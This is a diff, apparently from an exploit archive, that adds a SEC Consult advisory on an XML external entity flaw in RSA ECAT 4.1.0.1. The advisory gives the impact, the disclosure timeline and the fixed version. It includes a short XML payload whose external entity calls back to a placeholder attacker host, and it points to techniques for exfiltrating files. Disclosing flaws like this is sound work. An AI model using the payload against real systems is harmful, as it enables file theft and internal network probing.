BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : ShavProt
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
140
platforms/xml/webapps/40501.txt
Executable file
140
platforms/xml/webapps/40501.txt
Executable file
|
@ -0,0 +1,140 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
|
||||
=======================================================================
|
||||
title: XML External Entity Injection (XXE)
|
||||
product: RSA Enterprise Compromise Assessment Tool (ECAT)
|
||||
vulnerable version: 4.1.0.1
|
||||
fixed version: 4.1.2.0
|
||||
CVE Number: -
|
||||
impact: Medium
|
||||
homepage: https://www.rsa.com
|
||||
found: 2016-04-27
|
||||
by: Samandeep Singh (Office Singapore)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Bangkok - Berlin - Linz - Montreal - Moscow
|
||||
Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
https://www.sec-consult.com
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"RSA provides more than 30,000 customers around the world with the essential
|
||||
security capabilities to protect their most valuable assets from cyber threats.
|
||||
With RSA's award-winning products, organizations effectively detect,
|
||||
investigate, and respond to advanced attacks; confirm and manage identities; and
|
||||
ultimately, reduce IP theft, fraud, and cybercrime."
|
||||
|
||||
Source: https://www.rsa.com/en-us/company/about
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
By exploiting the XXE vulnerability, an attacker can get read access to the
|
||||
filesystem of the user's system using RSA ECAT client and thus obtain sensitive
|
||||
information from the system. It is also possible to scan ports of the internal
|
||||
hosts and cause DoS on the affected host.
|
||||
|
||||
SEC Consult recommends not to use the product until a thorough security
|
||||
review has been performed by security professionals and all identified
|
||||
issues have been resolved.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
1) XML External Entity Injection
|
||||
The used XML parser is resolving external XML entities which allows attackers
|
||||
to read files and send requests to systems on the internal network (e.g port
|
||||
scanning). The vulnerability can be exploited by tricking the user of
|
||||
the application to import a whitelisting file with malicious XML code.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1) XML External Entity Injection (XXE)
|
||||
|
||||
The RSA ECAT client allows users to import whitelisting files in XML format.
|
||||
By tricking the user to import an XML file with malicious XML code to the
|
||||
application, it's possible to exploit an XXE vulnerability within the application.
|
||||
|
||||
For example by importing the following XML code, arbitrary files can be read
|
||||
from the client's system. The following code generates the connection request
|
||||
from the client system to attacker system.
|
||||
|
||||
===============================================================================
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>
|
||||
===============================================================================
|
||||
|
||||
IP:port = IP address and port where the attacker is listening for connections
|
||||
|
||||
Furthermore some files can be exfiltrated to remote servers via the
|
||||
techniques described in:
|
||||
|
||||
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
|
||||
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
The XXE vulnerability has been verified to exist in the RSA ECAT software
|
||||
version 4.1.0.1 which was the latest version available at the time of
|
||||
discovery.
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2016-04-28: Vulnerabilities reported to the vendor by 3rd party
|
||||
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
|
||||
2016-10-11: SEC Consult releases security advisory
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Update to version 4.1.2.0
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
None
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
SEC Consult
|
||||
Bangkok - Berlin - Linz - Montreal - Moscow
|
||||
Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||
and application security to stay ahead of the attacker. The SEC Consult
|
||||
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||
of new offensive and defensive technologies for our customers. Hence our
|
||||
customers obtain the most current information about vulnerabilities and valid
|
||||
recommendation about the risk profile of new technologies.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://www.sec-consult.com/en/Career.htm
|
||||
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Mail: research at sec-consult dot com
|
||||
Web: https://www.sec-consult.com
|
||||
Blog: http://blog.sec-consult.com
|
||||
Twitter: https://twitter.com/sec_consult
|
||||
|
||||
EOF S. Singh / @2016
|
Loading…
Add table
Reference in a new issue